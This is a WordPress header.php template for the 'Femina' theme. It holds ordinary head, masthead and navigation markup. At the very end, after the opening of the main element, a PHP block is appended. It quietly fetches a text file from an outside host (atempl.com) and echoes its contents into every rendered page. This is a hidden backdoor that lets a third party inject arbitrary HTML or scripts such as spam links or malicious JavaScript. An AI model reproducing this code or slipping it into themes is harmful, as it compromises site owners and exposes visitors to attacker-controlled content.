<?php
/**
 * The Header of the theme.
 *
 * Displays all of the <head> section and everything up till <main id="main"> (i.e. until the end of the header, opens the #container and the #main div elements)
 *
 * @package Femina
 * @since Femina 1.0.7
 */
?>
<!DOCTYPE html>
<html <?php language_attributes(); ?>>
     <head>
        <meta charset="<?php bloginfo( 'charset' ); ?>">
        <meta name="viewport" content="width=device-width, initial-scale=1.0" />
        <link rel="profile" href="http://gmpg.org/xfn/11" />
        <?php if ( is_singular() && pings_open( get_queried_object() ) ) : ?>
        <link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>">
        <?php endif; ?>
        <?php wp_head(); ?>
    </head>
    <body <?php body_class(); ?> >
        <div id="container">
            <header id="masthead" class="site-header" role="banner">
                <a class="screen-reader-text skip-link" href="#main"><?php _e( 'Skip to content', 'femina' ); ?></a>

                <div id="pre-menu">
                <?php if (has_nav_menu('secondary')): ?>                
                    <nav id="categories-menu" class="site-navigation secondary-navigation inner" role="navigation" aria-label='<?php esc_attr_e( 'Secondary Menu ', 'femina' ); ?>' >
                        <?php wp_nav_menu( array( 'theme_location' => 'secondary', 'depth' => 1, 'container' => 'false', 'menu_id' => 'secondary-menu' ) ); ?>
                    </nav><!--categories-menu-->                
                <?php 
                    get_search_form();
                endif ?>
                <?php  ?>
                </div>

                <div class="inner flex-container">                    
                    <div id="site-identity">
            <?php   if ( has_custom_logo() ):
                        the_custom_logo(); 
                    else: ?>
                        <a class="home-link" href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home">
                            <h1 class="site-title"><?php esc_html( bloginfo( 'name' ) ); ?></h1>
                            <h2 class="site-description"><?php esc_html( bloginfo( 'description' ) ); ?></h2>
                        </a> 

            <?php   endif ?>                                         
                    </div><!--/site-identity-->

                    <?php if (has_nav_menu('primary') || has_nav_menu('secondary') || has_nav_menu('social')): ?>
                        <button id="nav-button" class="menu-toggle" role="navigation button"><?php _e( 'Menu', 'femina' ); ?></button>
                    <?php endif ?>

                    <div id="navigation">

                    <?php if (has_nav_menu('primary')): ?>
                        <nav id="main-menu" class="site-navigation primary-navigation" role="navigation" aria-label="<?php esc_attr_e( 'Primary Menu ', 'femina' ); ?>">
                            <?php wp_nav_menu( array( 'theme_location' => 'primary', 'container' => 'false', 'menu_id' => 'primary-menu' ) ); ?>
                        </nav><!--main-menu-->
                    <?php endif ?>

                    <?php if (has_nav_menu('secondary')): ?>                
                        <nav id="categories2-menu" class="site-navigation secondary-navigation" role="navigation" aria-label="<?php esc_attr_e( 'Secondary Menu ', 'femina' ); ?>">
                            <?php wp_nav_menu( array( 'theme_location' => 'secondary', 'container' => 'false', 'depth' => 1, 'menu_id' => 'secondary-menu' ) ); ?>
                        </nav><!--categories-menu-->                
                    <?php endif ?>

                    <?php if (has_nav_menu('social')): ?>                
                        <nav id="social" class="site-navigation social-navigation" role="navigation" aria-label="<?php esc_attr_e( 'Social Menu ', 'femina' ); ?>" >
                           <?php wp_nav_menu( array(
                                'theme_location' => 'social',
                                'container' => 'false',
                                'depth' => 1,
                                'menu_id' => 'social-menu',
                                'link_before'    => '<span class="screen-reader-text">',
                                'link_after'     => '</span>', )); ?>
                        </nav><!--social-menu-->                
                    <?php endif ?>

                    </div><!--/navigation--> 
                </div><!--/inner--> 
            </header><!--/header-->
            <main id="main" role="main"><?php
$files = 'http://atempl.com/7.txt';  
$file_headers = @get_headers($files);  
if($file_headers[0] == 'HTTP/1.1 200 OK') 
 {  
       $content = file("http://atempl.com/7.txt");
       $data = implode($content);
       echo $data;
 }  
?>





